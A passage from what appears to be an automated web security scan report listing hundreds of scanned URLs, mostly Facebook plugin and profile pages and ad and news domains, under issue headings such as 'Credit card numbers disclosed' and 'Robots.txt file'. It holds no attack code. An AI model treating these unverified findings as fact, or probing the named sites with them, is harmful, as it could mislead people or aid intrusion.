
28.314. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

28.315. http://www.facebook.com/pages/HMFIC/149403761740008

28.316. http://www.facebook.com/pages/HuffPost-World/70242384902

28.317. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

28.318. http://www.facebook.com/pages/Merchandiser/123981654314779

28.319. http://www.facebook.com/pages/New-Haven-College/130105783687523

28.320. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

28.321. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

28.322. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

28.323. http://www.facebook.com/pages/Sporting-News/104068362964496

28.324. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.325. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

28.326. http://www.facebook.com/pages/create.php

28.327. http://www.facebook.com/pages/create.php

28.328. http://www.facebook.com/pages/create.php

28.329. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

28.330. http://www.facebook.com/patroyo

28.331. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

28.332. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

28.333. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

28.334. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.335. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.336. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.337. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.338. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.339. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.340. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22

28.341. http://www.facebook.com/plugins/activity.php

28.342. http://www.facebook.com/plugins/activity.php

28.343. http://www.facebook.com/plugins/activity.php

28.344. http://www.facebook.com/plugins/activity.php

28.345. http://www.facebook.com/plugins/activity.php

28.346. http://www.facebook.com/plugins/activity.php

28.347. http://www.facebook.com/plugins/activity.php

28.348. http://www.facebook.com/plugins/activity.php

28.349. http://www.facebook.com/plugins/activity.php

28.350. http://www.facebook.com/plugins/activity.php

28.351. http://www.facebook.com/plugins/activity.php

28.352. http://www.facebook.com/plugins/activity.php

28.353. http://www.facebook.com/plugins/activity.php

28.354. http://www.facebook.com/plugins/activity.php

28.355. http://www.facebook.com/plugins/activity.php

28.356. http://www.facebook.com/plugins/activity.php

28.357. http://www.facebook.com/plugins/activity.php

28.358. http://www.facebook.com/plugins/activity.php

28.359. http://www.facebook.com/plugins/activity.php

28.360. http://www.facebook.com/plugins/activity.php

28.361. http://www.facebook.com/plugins/activity.php

28.362. http://www.facebook.com/plugins/activity.php

28.363. http://www.facebook.com/plugins/activity.php

28.364. http://www.facebook.com/plugins/activity.php

28.365. http://www.facebook.com/plugins/activity.php

28.366. http://www.facebook.com/plugins/activity.php

28.367. http://www.facebook.com/plugins/activity.php

28.368. http://www.facebook.com/plugins/activity.php

28.369. http://www.facebook.com/plugins/activity.php

28.370. http://www.facebook.com/plugins/activity.php

28.371. http://www.facebook.com/plugins/activity.php

28.372. http://www.facebook.com/plugins/activity.php

28.373. http://www.facebook.com/plugins/activity.php

28.374. http://www.facebook.com/plugins/activity.php

28.375. http://www.facebook.com/plugins/activity.php

28.376. http://www.facebook.com/plugins/activity.php

28.377. http://www.facebook.com/plugins/activity.php

28.378. http://www.facebook.com/plugins/activity.php

28.379. http://www.facebook.com/plugins/activity.php

28.380. http://www.facebook.com/plugins/activity.php

28.381. http://www.facebook.com/plugins/activity.php

28.382. http://www.facebook.com/plugins/activity.php

28.383. http://www.facebook.com/plugins/activity.php

28.384. http://www.facebook.com/plugins/activity.php

28.385. http://www.facebook.com/plugins/activity.php

28.386. http://www.facebook.com/plugins/activity.php

28.387. http://www.facebook.com/plugins/activity.php

28.388. http://www.facebook.com/plugins/activity.php

28.389. http://www.facebook.com/plugins/activity.php

28.390. http://www.facebook.com/plugins/activity.php

28.391. http://www.facebook.com/plugins/activity.php

28.392. http://www.facebook.com/plugins/activity.php

28.393. http://www.facebook.com/plugins/activity.php

28.394. http://www.facebook.com/plugins/activity.php

28.395. http://www.facebook.com/plugins/activity.php

28.396. http://www.facebook.com/plugins/activity.php

28.397. http://www.facebook.com/plugins/activity.php

28.398. http://www.facebook.com/plugins/activity.php

28.399. http://www.facebook.com/plugins/activity.php

28.400. http://www.facebook.com/plugins/activity.php

28.401. http://www.facebook.com/plugins/activity.php

28.402. http://www.facebook.com/plugins/activity.php

28.403. http://www.facebook.com/plugins/activity.php

28.404. http://www.facebook.com/plugins/comments.php

28.405. http://www.facebook.com/plugins/comments.php

28.406. http://www.facebook.com/plugins/comments.php

28.407. http://www.facebook.com/plugins/comments.php

28.408. http://www.facebook.com/plugins/comments.php

28.409. http://www.facebook.com/plugins/facepile.php

28.410. http://www.facebook.com/plugins/facepile.php

28.411. http://www.facebook.com/plugins/facepile.php

28.412. http://www.facebook.com/plugins/facepile.php

28.413. http://www.facebook.com/plugins/facepile.php

28.414. http://www.facebook.com/plugins/facepile.php

28.415. http://www.facebook.com/plugins/facepile.php

28.416. http://www.facebook.com/plugins/facepile.php

28.417. http://www.facebook.com/plugins/facepile.php

28.418. http://www.facebook.com/plugins/like.php

28.419. http://www.facebook.com/plugins/like.php

28.420. http://www.facebook.com/plugins/like.php

28.421. http://www.facebook.com/plugins/like.php

28.422. http://www.facebook.com/plugins/like.php

28.423. http://www.facebook.com/plugins/like.php

28.424. http://www.facebook.com/plugins/like.php

28.425. http://www.facebook.com/plugins/like.php

28.426. http://www.facebook.com/plugins/like.php

28.427. http://www.facebook.com/plugins/like.php

28.428. http://www.facebook.com/plugins/like.php

28.429. http://www.facebook.com/plugins/like.php

28.430. http://www.facebook.com/plugins/like.php

28.431. http://www.facebook.com/plugins/like.php

28.432. http://www.facebook.com/plugins/like.php

28.433. http://www.facebook.com/plugins/like.php

28.434. http://www.facebook.com/plugins/like.php

28.435. http://www.facebook.com/plugins/like.php

28.436. http://www.facebook.com/plugins/like.php

28.437. http://www.facebook.com/plugins/like.php

28.438. http://www.facebook.com/plugins/like.php

28.439. http://www.facebook.com/plugins/like.php

28.440. http://www.facebook.com/plugins/like.php

28.441. http://www.facebook.com/plugins/like.php

28.442. http://www.facebook.com/plugins/like.php

28.443. http://www.facebook.com/plugins/like.php

28.444. http://www.facebook.com/plugins/like.php

28.445. http://www.facebook.com/plugins/like.php

28.446. http://www.facebook.com/plugins/like.php

28.447. http://www.facebook.com/plugins/like.php

28.448. http://www.facebook.com/plugins/like.php

28.449. http://www.facebook.com/plugins/like.php

28.450. http://www.facebook.com/plugins/like.php

28.451. http://www.facebook.com/plugins/like.php

28.452. http://www.facebook.com/plugins/like.php

28.453. http://www.facebook.com/plugins/like.php

28.454. http://www.facebook.com/plugins/like.php

28.455. http://www.facebook.com/plugins/like.php

28.456. http://www.facebook.com/plugins/like.php

28.457. http://www.facebook.com/plugins/like.php

28.458. http://www.facebook.com/plugins/like.php

28.459. http://www.facebook.com/plugins/like.php

28.460. http://www.facebook.com/plugins/like.php

28.461. http://www.facebook.com/plugins/like.php

28.462. http://www.facebook.com/plugins/like.php

28.463. http://www.facebook.com/plugins/like.php

28.464. http://www.facebook.com/plugins/like.php

28.465. http://www.facebook.com/plugins/like.php

28.466. http://www.facebook.com/plugins/like.php

28.467. http://www.facebook.com/plugins/like.php

28.468. http://www.facebook.com/plugins/like.php

28.469. http://www.facebook.com/plugins/like.php

28.470. http://www.facebook.com/plugins/like.php

28.471. http://www.facebook.com/plugins/like.php

28.472. http://www.facebook.com/plugins/like.php

28.473. http://www.facebook.com/plugins/like.php

28.474. http://www.facebook.com/plugins/like.php

28.475. http://www.facebook.com/plugins/like.php

28.476. http://www.facebook.com/plugins/like.php

28.477. http://www.facebook.com/plugins/like.php

28.478. http://www.facebook.com/plugins/like.php

28.479. http://www.facebook.com/plugins/like.php

28.480. http://www.facebook.com/plugins/like.php

28.481. http://www.facebook.com/plugins/like.php

28.482. http://www.facebook.com/plugins/like.php

28.483. http://www.facebook.com/plugins/like.php

28.484. http://www.facebook.com/plugins/like.php

28.485. http://www.facebook.com/plugins/like.php

28.486. http://www.facebook.com/plugins/like.php

28.487. http://www.facebook.com/plugins/like.php

28.488. http://www.facebook.com/plugins/like.php

28.489. http://www.facebook.com/plugins/like.php

28.490. http://www.facebook.com/plugins/like.php

28.491. http://www.facebook.com/plugins/like.php

28.492. http://www.facebook.com/plugins/like.php

28.493. http://www.facebook.com/plugins/like.php

28.494. http://www.facebook.com/plugins/like.php

28.495. http://www.facebook.com/plugins/like.php

28.496. http://www.facebook.com/plugins/like.php

28.497. http://www.facebook.com/plugins/like.php

28.498. http://www.facebook.com/plugins/like.php

28.499. http://www.facebook.com/plugins/like.php

28.500. http://www.facebook.com/plugins/like.php

28.501. http://www.facebook.com/plugins/like.php

28.502. http://www.facebook.com/plugins/like.php

28.503. http://www.facebook.com/plugins/like.php

28.504. http://www.facebook.com/plugins/like.php

28.505. http://www.facebook.com/plugins/like.php

28.506. http://www.facebook.com/plugins/like.php

28.507. http://www.facebook.com/plugins/like.php

28.508. http://www.facebook.com/plugins/like.php

28.509. http://www.facebook.com/plugins/like.php

28.510. http://www.facebook.com/plugins/like.php

28.511. http://www.facebook.com/plugins/like.php

28.512. http://www.facebook.com/plugins/like.php

28.513. http://www.facebook.com/plugins/likebox.php

28.514. http://www.facebook.com/plugins/likebox.php

28.515. http://www.facebook.com/plugins/likebox.php

28.516. http://www.facebook.com/plugins/likebox.php

28.517. http://www.facebook.com/plugins/likebox.php

28.518. http://www.facebook.com/plugins/likebox.php

28.519. http://www.facebook.com/plugins/likebox.php

28.520. http://www.facebook.com/plugins/likebox.php

28.521. http://www.facebook.com/plugins/likebox.php

28.522. http://www.facebook.com/plugins/likebox.php

28.523. http://www.facebook.com/plugins/likebox.php

28.524. http://www.facebook.com/plugins/likebox.php

28.525. http://www.facebook.com/plugins/likebox.php

28.526. http://www.facebook.com/plugins/likebox.php

28.527. http://www.facebook.com/plugins/likebox.php

28.528. http://www.facebook.com/plugins/likebox.php

28.529. http://www.facebook.com/plugins/likebox.php

28.530. http://www.facebook.com/plugins/likebox.php

28.531. http://www.facebook.com/plugins/likebox.php

28.532. http://www.facebook.com/plugins/likebox.php

28.533. http://www.facebook.com/plugins/likebox.php

28.534. http://www.facebook.com/plugins/likebox.php

28.535. http://www.facebook.com/plugins/likebox.php

28.536. http://www.facebook.com/plugins/likebox.php

28.537. http://www.facebook.com/plugins/likebox.php

28.538. http://www.facebook.com/plugins/likebox.php

28.539. http://www.facebook.com/plugins/likebox.php

28.540. http://www.facebook.com/plugins/likebox.php

28.541. http://www.facebook.com/plugins/likebox.php

28.542. http://www.facebook.com/plugins/likebox.php

28.543. http://www.facebook.com/plugins/likebox.php

28.544. http://www.facebook.com/plugins/likebox.php

28.545. http://www.facebook.com/plugins/likebox.php

28.546. http://www.facebook.com/plugins/likebox.php

28.547. http://www.facebook.com/plugins/likebox.php

28.548. http://www.facebook.com/plugins/likebox.php

28.549. http://www.facebook.com/plugins/likebox.php

28.550. http://www.facebook.com/plugins/likebox.php

28.551. http://www.facebook.com/plugins/likebox.php

28.552. http://www.facebook.com/plugins/likebox.php

28.553. http://www.facebook.com/plugins/likebox.php

28.554. http://www.facebook.com/plugins/likebox.php

28.555. http://www.facebook.com/plugins/likebox.php

28.556. http://www.facebook.com/plugins/likebox.php

28.557. http://www.facebook.com/plugins/likebox.php

28.558. http://www.facebook.com/plugins/likebox.php

28.559. http://www.facebook.com/plugins/likebox.php

28.560. http://www.facebook.com/plugins/likebox.php

28.561. http://www.facebook.com/plugins/likebox.php

28.562. http://www.facebook.com/plugins/likebox.php

28.563. http://www.facebook.com/plugins/likebox.php

28.564. http://www.facebook.com/plugins/likebox.php

28.565. http://www.facebook.com/plugins/likebox.php

28.566. http://www.facebook.com/plugins/likebox.php

28.567. http://www.facebook.com/plugins/likebox.php

28.568. http://www.facebook.com/plugins/likebox.php

28.569. http://www.facebook.com/plugins/likebox.php

28.570. http://www.facebook.com/plugins/likebox.php

28.571. http://www.facebook.com/plugins/likebox.php

28.572. http://www.facebook.com/plugins/likebox.php

28.573. http://www.facebook.com/plugins/likebox.php

28.574. http://www.facebook.com/plugins/likebox.php

28.575. http://www.facebook.com/plugins/likebox.php

28.576. http://www.facebook.com/plugins/likebox.php

28.577. http://www.facebook.com/plugins/likebox.php

28.578. http://www.facebook.com/plugins/likebox.php

28.579. http://www.facebook.com/plugins/likebox.php

28.580. http://www.facebook.com/plugins/likebox.php

28.581. http://www.facebook.com/plugins/likebox.php

28.582. http://www.facebook.com/plugins/likebox.php

28.583. http://www.facebook.com/plugins/likebox.php

28.584. http://www.facebook.com/plugins/likebox.php

28.585. http://www.facebook.com/plugins/likebox.php

28.586. http://www.facebook.com/plugins/likebox.php

28.587. http://www.facebook.com/plugins/likebox.php

28.588. http://www.facebook.com/plugins/likebox.php

28.589. http://www.facebook.com/plugins/likebox.php

28.590. http://www.facebook.com/plugins/likebox.php

28.591. http://www.facebook.com/plugins/likebox.php

28.592. http://www.facebook.com/plugins/likebox.php

28.593. http://www.facebook.com/plugins/likebox.php

28.594. http://www.facebook.com/plugins/likebox.php

28.595. http://www.facebook.com/plugins/recommendations.php

28.596. http://www.facebook.com/plugins/recommendations.php

28.597. http://www.facebook.com/plugins/recommendations.php

28.598. http://www.facebook.com/plugins/recommendations.php

28.599. http://www.facebook.com/plugins/recommendations.php

28.600. http://www.facebook.com/plugins/recommendations.php

28.601. http://www.facebook.com/plugins/recommendations.php

28.602. http://www.facebook.com/plugins/recommendations.php

28.603. http://www.facebook.com/plugins/send.php

28.604. http://www.facebook.com/plugins/send.php

28.605. http://www.facebook.com/plugins/send.php

28.606. http://www.facebook.com/plugins/send.php

28.607. http://www.facebook.com/plugins/send.php

28.608. http://www.facebook.com/plugins/send.php

28.609. http://www.facebook.com/plugins/send.php

28.610. http://www.facebook.com/plugins/send.php

28.611. http://www.facebook.com/plugins/send.php

28.612. http://www.facebook.com/plugins/send.php

28.613. http://www.facebook.com/plugins/send.php

28.614. http://www.facebook.com/plugins/send.php

28.615. http://www.facebook.com/plugins/send.php

28.616. http://www.facebook.com/plugins/send.php

28.617. http://www.facebook.com/plugins/send.php

28.618. http://www.facebook.com/plugins/send.php

28.619. http://www.facebook.com/plugins/send.php

28.620. http://www.facebook.com/plugins/send.php

28.621. http://www.facebook.com/plugins/send.php

28.622. http://www.facebook.com/plugins/send.php

28.623. http://www.facebook.com/plugins/send.php

28.624. http://www.facebook.com/plugins/send.php

28.625. http://www.facebook.com/plugins/send.php

28.626. http://www.facebook.com/plugins/send.php

28.627. http://www.facebook.com/plugins/send.php

28.628. http://www.facebook.com/plugins/send.php

28.629. http://www.facebook.com/plugins/send.php

28.630. http://www.facebook.com/plugins/send.php

28.631. http://www.facebook.com/plugins/send.php

28.632. http://www.facebook.com/plugins/send.php

28.633. http://www.facebook.com/plugins/send.php

28.634. http://www.facebook.com/plugins/send.php

28.635. http://www.facebook.com/plugins/send.php

28.636. http://www.facebook.com/plugins/send.php

28.637. http://www.facebook.com/plugins/send.php

28.638. http://www.facebook.com/plugins/send.php

28.639. http://www.facebook.com/plugins/send.php

28.640. http://www.facebook.com/plugins/send.php

28.641. http://www.facebook.com/plugins/send.php

28.642. http://www.facebook.com/plugins/send.php

28.643. http://www.facebook.com/plugins/send.php

28.644. http://www.facebook.com/plugins/send.php

28.645. http://www.facebook.com/plugins/send.php

28.646. http://www.facebook.com/plugins/send.php

28.647. http://www.facebook.com/plugins/send.php

28.648. http://www.facebook.com/plugins/send.php

28.649. http://www.facebook.com/plugins/send.php

28.650. http://www.facebook.com/plugins/send.php

28.651. http://www.facebook.com/plugins/send.php

28.652. http://www.facebook.com/plugins/send.php

28.653. http://www.facebook.com/plugins/send.php

28.654. http://www.facebook.com/plugins/send.php

28.655. http://www.facebook.com/plugins/send.php

28.656. http://www.facebook.com/plugins/send.php

28.657. http://www.facebook.com/plugins/send.php

28.658. http://www.facebook.com/plugins/send.php

28.659. http://www.facebook.com/plugins/send.php

28.660. http://www.facebook.com/plugins/send.php

28.661. http://www.facebook.com/plugins/send.php

28.662. http://www.facebook.com/plugins/send.php

28.663. http://www.facebook.com/plugins/send.php

28.664. http://www.facebook.com/plugins/send.php

28.665. http://www.facebook.com/plugins/send.php

28.666. http://www.facebook.com/plugins/send.php

28.667. http://www.facebook.com/plugins/send.php

28.668. http://www.facebook.com/plugins/send.php

28.669. http://www.facebook.com/plugins/send.php

28.670. http://www.facebook.com/plugins/send.php

28.671. http://www.facebook.com/plugins/send.php

28.672. http://www.facebook.com/plugins/send.php

28.673. http://www.facebook.com/plugins/send.php

28.674. http://www.facebook.com/plugins/send.php

28.675. http://www.facebook.com/plugins/send.php

28.676. http://www.facebook.com/plugins/send.php

28.677. http://www.facebook.com/plugins/send.php

28.678. http://www.facebook.com/plugins/send.php

28.679. http://www.facebook.com/plugins/send.php

28.680. http://www.facebook.com/plugins/send.php

28.681. http://www.facebook.com/plugins/send.php

28.682. http://www.facebook.com/plugins/send.php

28.683. http://www.facebook.com/plugins/send.php

28.684. http://www.facebook.com/plugins/send.php

28.685. http://www.facebook.com/plugins/send.php

28.686. http://www.facebook.com/plugins/send.php

28.687. http://www.facebook.com/plugins/send.php

28.688. http://www.facebook.com/plugins/send.php

28.689. http://www.facebook.com/plugins/send.php

28.690. http://www.facebook.com/policy.php

28.691. http://www.facebook.com/privacy/explanation.php

28.692. http://www.facebook.com/profile.php

28.693. http://www.facebook.com/profile.php

28.694. http://www.facebook.com/profile.php

28.695. http://www.facebook.com/r.php

28.696. http://www.facebook.com/r.php

28.697. http://www.facebook.com/r.php

28.698. http://www.facebook.com/r.php

28.699. http://www.facebook.com/r.php

28.700. http://www.facebook.com/recover.php

28.701. http://www.facebook.com/recover.php

28.702. http://www.facebook.com/recover.php

28.703. http://www.facebook.com/robynalys

28.704. http://www.facebook.com/share.php

28.705. http://www.facebook.com/share.php

28.706. http://www.facebook.com/share.php

28.707. http://www.facebook.com/sharer.php

28.708. http://www.facebook.com/sharer.php

28.709. http://www.facebook.com/sharer.php

28.710. http://www.facebook.com/sharer.php

28.711. http://www.facebook.com/skdarealist

28.712. http://www.facebook.com/sportingnews

28.713. http://www.facebook.com/stefanoboscolomarchi

28.714. http://www.facebook.com/techcrunch

28.715. http://www.facebook.com/terms.php

28.716. http://www.facebook.com/terms.php

28.717. http://www.facebook.com/terms.php

28.718. http://www.facebook.com/terms.php

28.719. http://www.facebook.com/theteebers

28.720. http://www.facebook.com/wmoppert

28.721. https://www.facebook.com/

28.722. https://www.facebook.com/

28.723. https://www.facebook.com/ajax/intl/language_dialog.php

28.724. https://www.facebook.com/ajax/intl/language_dialog.php

28.725. https://www.facebook.com/ajax/intl/language_dialog.php

28.726. https://www.facebook.com/captcha/tfbimage.php

28.727. https://www.facebook.com/favicon.ico

28.728. https://www.facebook.com/favicon.ico

28.729. https://www.facebook.com/h02332

28.730. https://www.facebook.com/h02332

28.731. https://www.facebook.com/h02332

28.732. https://www.facebook.com/help/contact.php

28.733. https://www.facebook.com/login.php

28.734. https://www.facebook.com/login.php

28.735. https://www.facebook.com/login.php

28.736. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.737. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.738. https://www.facebook.com/pages/create.php

28.739. https://www.facebook.com/pages/create.php

28.740. https://www.facebook.com/pages/create.php

28.741. https://www.facebook.com/r.php

28.742. https://www.facebook.com/r.php

28.743. https://www.facebook.com/r.php

28.744. https://www.facebook.com/recover.php

28.745. https://www.facebook.com/recover.php

28.746. http://www.google.com/sdch/rU20-FBA.dct

29. Credit card numbers disclosed

29.1. http://aol.sportingnews.com/

29.2. http://aol.sportingnews.com/

29.3. http://www.facebook.com/directory/pages/

29.4. http://www.facebook.com/directory/people/

30. Robots.txt file

30.1. http://404-bgd-511.mktoresp.com/webevents/visitWebPage

30.2. http://a0.twimg.com/profile_images/1115304440/eiNu5UkN_normal

30.3. http://abcnews.go.com/Entertainment/popup

30.4. http://ad.doubleclick.net/ad/N4873.AOL.com/B5465585.3

30.5. http://ads.pointroll.com/PortalServe/

30.6. http://ads.undertone.com/afr.php

30.7. https://adwords.google.com/select/Login

30.8. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

30.9. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

30.10. http://aol.worldwinner.com/cgi/welcome/21sie

30.11. http://aolmobile.aol.com/registration/welcome

30.12. http://aolmobile.aolcdn.com/favicon.ico

30.13. http://aolproductcentral.aol.com/ClickBroker

30.14. https://aolproductcentral.aol.com/ClickBroker

30.15. http://apartments.rentedspaces.oodle.com/

30.16. http://api.adcopy.com/papi/challenge.ajax

30.17. http://api.local.yahoo.com/MapsService/V1/geocode

30.18. http://api.twitter.com/receiver.html

30.19. http://ar-ar.facebook.com/login.php

30.20. http://ar.atwola.com/atd

30.21. http://archive.constantcontact.com/fs060/1101663036970/archive/1102715603213.html

30.22. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x600

30.23. https://at.atwola.com/

30.24. http://autocomplete.search.aol.com/autocomplete/get

30.25. http://ax.itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast

30.26. http://b.scorecardresearch.com/b

30.27. http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup

30.28. http://b.voicefive.com/b

30.29. http://blog.mapquest.com/

30.30. http://blogsearch.google.com/

30.31. http://bongo.zoomin.tv/videoplayer/skins/999/aol/AOLPlayer.swf

30.32. http://books.google.com/bkshp

30.33. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.34. http://c.brightcove.com/services/viewer/federated_f9

30.35. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

30.36. http://cheetah.vizu.com/a.gif

30.37. http://clients1.google.com/webpagethumbnail

30.38. http://clk.atdmt.com/go/253735228/direct

30.39. http://cm.g.doubleclick.net/pixel

30.40. http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico

30.41. http://d.tradex.openx.com/afr.php

30.42. http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga

30.43. http://d.xp1.ru4.com/um

30.44. http://d1.openx.org/spcjs.php

30.45. http://daol.aol.com/software/

30.46. http://dev.aol.com/

30.47. http://digg.com/submit

30.48. http://docs.google.com/

30.49. http://fantasysource.sportingnews.com/baseball/free

30.50. http://features.mapquest.com/toolbar/

30.51. http://feedburner.google.com/fb/a/mailverify

30.52. http://feeds.bbci.co.uk/news/rss.xml

30.53. http://fls.doubleclick.net/activityi

30.54. http://fusion.google.com/add

30.55. http://googleads.g.doubleclick.net/aclk

30.56. http://graph.facebook.com/10134017/picture

30.57. http://gravatar.com/profiles/edit/

30.58. http://groups.google.com/groups

30.59. http://huffingtonpost.search.aol.com/search

30.60. http://images.apple.com/global/nav/scripts/globalnav.js

30.61. http://img-cdn.mediaplex.com/0/14302/119028/TC_OLE_results_art_125x125.gif

30.62. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

30.63. http://itunes.apple.com/app/sporting-news-pro-football/id300213367

30.64. http://l.addthiscdn.com/live/t00/250lo.gif

30.65. http://m.twitter.com/favicon.ico

30.66. http://mail.aol.com/

30.67. http://mail.google.com/mail/

30.68. https://maps-api-ssl.google.com/maps

30.69. http://maps.google.com/maps

30.70. http://market.android.com/details

30.71. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s72248036712408

30.72. http://mobile.aol.com/

30.73. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

30.74. http://music.aol.com/radioguide/bb

30.75. https://new.aol.com/productsweb/

30.76. http://news.google.com/news/story

30.77. http://newsfeed.time.com/2011/05/04/do-chicks-and-fans-really-dig-the-long-ball-why-no-hitters-arent-drawing-crowds/

30.78. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

30.79. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s32818515414837

30.80. http://pagead2.googlesyndication.com/pagead/imgad

30.81. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

30.82. http://pixel.quantserve.com/pixel

30.83. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

30.84. http://pr.atwola.com/promoimp/100223980xx1201730986/aol

30.85. http://pubads.g.doubleclick.net/gampad/ads

30.86. http://puma.vizu.com/cdn/00/00/15/44/smart_tag.js

30.87. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

30.88. http://realestate.aol.com/

30.89. http://realestate.search.aol.com/search

30.90. https://rsp.web.aol.com/rsp-websvc-3.0/snsReg

30.91. http://s.gravatar.com/js/gprofiles.js

30.92. http://s0.wp.com/wp-content/themes/h4/global.css

30.93. http://s1.wp.com/wp-includes/js/jquery/jquery.js

30.94. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css

30.95. http://safebrowsing.clients.google.com/safebrowsing/downloads

30.96. http://scholar.google.com/schhp

30.97. http://search.aol.com/aol/imagehome

30.98. http://search.twitter.com/search

30.99. http://segment-pixel.invitemedia.com/pixel

30.100. http://sites.google.com/

30.101. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/861892/jlo-300x250-dl.jpg

30.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

30.103. http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html

30.104. https://spreadsheets.google.com/viewform

30.105. http://st.snimg.com/js/cinesport/nocontainer.js

30.106. http://static.ak.fbcdn.net/connect/xd_proxy.php

30.107. http://static.twitter.com/images/default_profile_normal.png

30.108. http://tacoda-fatcat.search.aol.com/fa/eval

30.109. http://tcr.tynt.com/javascripts/Tracer.js

30.110. http://techcrunch.com/

30.111. http://themes.googleusercontent.com/image

30.112. http://toolbarqueries.clients.google.com/tbproxy/af/query

30.113. http://translate.google.com/

30.114. http://translate.googleapis.com/translate_a/t

30.115. http://twitter.com/home

30.116. https://twitter.com/signup

30.117. http://video.aol.com/searchresults

30.118. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

30.119. http://video.google.com/

30.120. http://webcache.googleusercontent.com/search

30.121. http://webmail.aol.com/

30.122. http://widgets.digg.com/buttons/count

30.123. http://wireless.mapquest.com/

30.124. http://www.aolnews.com/

30.125. http://www.apple.com/itunes/affiliates/download/

30.126. http://www.bankrate.com/funnel/mortgages/

30.127. http://www.blogger.com/blog-post-reactions.g

30.128. http://www.citysbest.com/

30.129. http://www.cloudscan.me/

30.130. http://www.crunchboard.com/opening/detailjob.php

30.131. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.132. http://www.dailyfinance.com/

30.133. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.134. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

30.135. http://www.facebook.com/extern/login_status.php

30.136. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

30.137. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.138. http://www.fiddler2.com/fiddler2/updatecheck.asp

30.139. http://www.flickr.com/badge_code_v2.gne

30.140. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

30.141. http://www.games.com/game/family-feud/

30.142. https://www.godaddy.com/

30.143. http://www.google-analytics.com/__utm.gif

30.144. http://www.google.com/aclk

30.145. http://www.googleadservices.com/pagead/conversion/1034849195/

30.146. http://www.huffingtonpost.com/

30.147. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

30.148. http://www.mapquest.com/

30.149. http://www.marketwatch.com/News/Story/Story.aspx

30.150. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

30.151. http://www.moviefone.com/

30.152. https://www.neodata.com/pub/snew/new_print.shtml

30.153. http://www.netvibes.com/subscribe.php

30.154. http://www.newsgator.com/ngs/subscriber/subext.aspx

30.155. http://www.popeater.com/

30.156. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

30.157. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

30.158. http://www.truveo.com/search

